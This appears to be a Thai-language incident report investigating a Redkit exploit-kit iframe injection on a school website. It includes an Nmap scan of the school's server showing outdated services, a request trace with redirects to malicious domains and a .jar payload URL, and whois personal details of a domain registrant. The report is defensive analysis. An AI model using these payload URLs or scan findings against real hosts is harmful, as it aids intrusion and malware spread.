ตรวจมัลแวร์ Redkit exploit kit iframe injection
++++++++++++++++++++++++++++++++++++++++++++++
พบเหตุการณ์
++++++++++++++++++++++++++++++++++++++++++++++
ที่ http://www.cru.ac.th/cru_web/
ตรวจสอบจากเครือข่ายแม่ข่าย
++++++++++++++++++++++++++++++++++++++++++++++
Nmap scan report for 110.77.220.122 Host is up (0.31s latency). Not shown: 992 filtered ports PORT STATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp open ftp vsftpd (before 2.0.8) or WU-FTPD |_banner: 220 Welcome to CRU FTP services. 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) |_banner: SSH-2.0-OpenSSH_4.3 25/tcp closed smtp 80/tcp open http Apache httpd 2.2.3 ((CentOS)) | http-headers: | Date: Tue, 23 Jul 2013 06:40:32 GMT | Server: Apache/2.2.3 (CentOS) | Last-Modified: Wed, 10 Jul 2013 07:45:56 GMT | ETag: "1426800c-1556e-4e12377bfb500" | Accept-Ranges: bytes | Content-Length: 87406 | Connection: close | Content-Type: text/html | |_ (Request type: GET) | http-title: xE0xB9x82xE0xB8xA3xE0xB8x87xE0xB9x80xE0xB8xA3xE0xB8xB5xE0xB8xA2xE0xB8x99xE0xB8x8AxE0xB8xA5xE0xB8xA3xE0xB8xB2xE0xB8xA9xE0xB8x8FxE0xB8xA3xE0xB8xADxE0xB8xB3xE0xB8xA3xE0xB8xB8xE0xB8x87 xE0... |_Requested resource was http://110.77.220.122/cru_web/ 110/tcp closed pop3 143/tcp closed imap 443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS)) | http-headers: |_ (Request type: GET) | ssl-cert: Subject: commonName=Chon1/organizationName=Chonradsadornumrung School/stateOrProvinceName=Chonburi/countryName=TH/emailAddress=cru_school@hotmail.com/localityName=Chonburi/organizationalUnitName=Chonchai | Issuer: commonName=Chon1/organizationName=Chonradsadornumrung School/stateOrProvinceName=Chonburi/countryName=TH/emailAddress=cru_school@hotmail.com/localityName=Chonburi/organizationalUnitName=Chonchai | Public Key type: rsa | Public Key bits: 1024 | Not valid before: 2012-05-14T14:37:18+00:00 | Not valid after: 2032-05-09T14:37:18+00:00 | MD5: 394a 5a16 1dfb f58a 3705 69dc 47a5 4908 | SHA-1: 57c1 542d 00cd 6554 b04d 3d54 13ff bec0 d3fd d194 | -----BEGIN CERTIFICATE----- | MIICvTCCAiYCCQDdu+DGElp74DANBgkqhkiG9w0BAQUFADCBojELMAkGA1UEBhMC | VEgxETAPBgNVBAgTCENob25idXJpMREwDwYDVQQHEwhDaG9uYnVyaTEjMCEGA1UE | ChMaQ2hvbnJhZHNhZG9ybnVtcnVuZyBTY2hvb2wxETAPBgNVBAsTCENob25jaGFp | MQ4wDAYDVQQDEwVDaG9uMTElMCMGCSqGSIb3DQEJARYWY3J1X3NjaG9vbEBob3Rt | YWlsLmNvbTAeFw0xMjA1MTQxNDM3MThaFw0zMjA1MDkxNDM3MThaMIGiMQswCQYD | VQQGEwJUSDERMA8GA1UECBMIQ2hvbmJ1cmkxETAPBgNVBAcTCENob25idXJpMSMw | IQYDVQQKExpDaG9ucmFkc2Fkb3JudW1ydW5nIFNjaG9vbDERMA8GA1UECxMIQ2hv | bmNoYWkxDjAMBgNVBAMTBUNob24xMSUwIwYJKoZIhvcNAQkBFhZjcnVfc2Nob29s | QGhvdG1haWwuY29tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDUNiDSmaZ3 | neIoKKaDubNIT3tKHx8y84L7bfs+xC319iNtgHFv/DsnaQS4tjPVrI3jorK8FDzV | K9n5TNLIEarayHft7HOzToerNcwYshrArb8qpXrRD7SJoHfmMH5z+CE9TqFQEh22 | fDssKN0+/mA2/GMsxX7P1D5VbAm+BdM95QIDAQABMA0GCSqGSIb3DQEBBQUAA4GB | AG051xp8Q6hvcW+IhJRXAanVKtod7TXG4ZVQ0Elx8AxsnGdk4rD0mvPXE7vWf7bG | onvP8eBQKv4SvHLDzee9qxRxwcZAGXsI80TagIG0ekI4q03Nk3RiaycWDgP7kR48 | BOhMR+pMi8RQfZTdjBK14GOD/wgpBVlA2ycvg+87ZOwg |_-----END CERTIFICATE----- Aggressive OS guesses: Linux 2.6.18 (92%), Linux 2.6.32 (92%), FreeBSD 6.2-RELEASE (91%), Linux 2.6.9 - 2.6.18 (91%), Cisco UC320W PBX (Linux 2.6) (90%), Linux 2.6.9 (90%), Linux 2.6.22.1-32.fc6 (x86, SMP) (89%), Linux 2.6.5 (89%), Linux 2.6.11 (89%), Linux 2.6.28 (89%) No exact OS matches for host (test conditions non-ideal). Service Info: Host: CRU Host script results: | asn-query: | BGP: 110.77.220.0/24 and 110.77.208.0/20 | Country: TH | Origin AS: 131090 - CAT-IDC-4BYTENET-AS-AP CAT TELECOM Public Company Ltd,CAT |_ Peer AS: 4651 | dns-blacklist: | SPAM |_ l2.apews.org - SPAM | hostmap-ip2hosts: | hosts: | cru.ac.th |_ www.cru.ac.th
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
การเชื่อมโยง
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
พบสิ่งผิดปกติ
ที่เกิดจาก iframe ซ่อนโดแมนมัลแวร์ในเว็บ
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
width="210" height="210" src="source/swf/clock.swf" quality="high"
pluginspage="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash"
type="application/x-shockwave-flash">
width=“864” height=“354” src=“source/swf/banner.swf” quality=“high”
pluginspage="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash"
type="application/x-shockwave-flash">
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
ตรวจการเรียกข้อมูล
++++++++++++++++++++++++++++++++++++++++++
URL | Status | Content Type |
---|---|---|
http://www.cru.ac.th/ | 302 | text/html |
http://www.cru.ac.th/cru_web/ | 200 | text/html |
http://www.cru.ac.th/cru_web/js/jquery.js | 200 | application/x-javascript |
http://mybodybuildingjourney.com/oeef.html?j=3267321 | 301 | text/html |
http://mikeborge.com/oeef.html?j=3267321 | 200 | text/html |
http://mikeborge.com/0o4.jar | 200 | application/zip |
about:blank | 200 | text/html |
http://www.cru.ac.th/cru_web/js/easySlider1.7.js | 200 | application/x-javascript |
http://www.cru.ac.th/cru_web/Scripts/AC_RunActiveContent.js | 200 | application/x-javascript |
http://www.cru.ac.th/cru_web/source/swf/banner.swf | 200 | application/x-shockwave-flash |
http://www.cru.ac.th/cru_web/source/swf/clock.swf | 200 | application/x-shockwave-flash |
http://artisticgenepool.com/oaaf.html?j=3267321 | 301 | text/html |
http://mikeborge.com/oaaf.html?j=3267321 | 404 | empty |
http://mybodybuildingjourney.com/oeef.html?i=3267321 | 301 | text/html |
http://mikeborge.com/oeef.html?i=3267321 | 404 | empty |
http://www.cru.ac.th/cru_web/css/mainMenu.css | 200 | text/css |
http://www.cru.ac.th/cru_web/css/screen.css | 404 | text/html |
http://www.cru.ac.th/cru_web/css/topMenu.css | 200 | text/css |
http://www.cru.ac.th/cru_web/css/personMenu.css | 404 | text/html |
Redirects
From | To |
---|---|
http://www.cru.ac.th/ | http://www.cru.ac.th/cru_web/ |
http://mybodybuildingjourney.com/oeef.html?j=3267321 | http://mikeborge.com/oeef.html?j=3267321 |
http://artisticgenepool.com/oaaf.html?j=3267321 | http://mikeborge.com/oaaf.html?j=3267321 |
http://mybodybuildingjourney.com/oeef.html?i=3267321 | http://mikeborge.com/oeef.html?i=3267321 |
ActiveX controls
-
D27CDB6E-AE6D-11CF-96B8-444553540000 Name Value Attributes movie source/swf/clock.swf
jQuery1366577423256 147.0
1022.0
quality high
- =================================
- ตรวจ HTTP
- =================================
- โหลด HTTP Capture แบบ Proxy Request จะเห็นการติดต่อไปที่ เว็บมัลแวร์ mybodybuildingjourney.com
==============================================================
ตรวจ Whois
==============================================================
Domain name: mybodybuildingjourney.com
Registrant Contact:
Pete81
Petri Olsson ()
Fax:
Saarenvainionkatu 15 D 57
Tampere, FIN 33710
FI
Administrative Contact:
Pete81
Petri Olsson (holaluna81@yahoo.com)
+358.405079703
Fax: +1.5555555555
Saarenvainionkatu 15 D 57
Tampere, FIN 33710
FI
Technical Contact:
Pete81
Petri Olsson (holaluna81@yahoo.com)
+358.405079703
Fax: +1.5555555555
Saarenvainionkatu 15 D 57
Tampere, FIN 33710
FI
Status: Locked
Name Servers:
ns3321.hostgator.com
ns3322.hostgator.com
Creation date: 15 Oct 2009 16:41:05
Expiration date: 15 Oct 2013 16:41:05
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Link
https://www.virustotal.com/th/url/e23ec6b60262684212b39c1751a04d5fe8c573beb91826b30c50684c257ee39f/analysis/
http://wepawet.iseclab.org/view.php?hash=66100e0d535a4c1119acb647613b4b70&t=1366577405&type=js
http://urlquery.net/report.php?id=2104305
http://checkip.me/whomap.php?domain=mybodybuildingjourney.com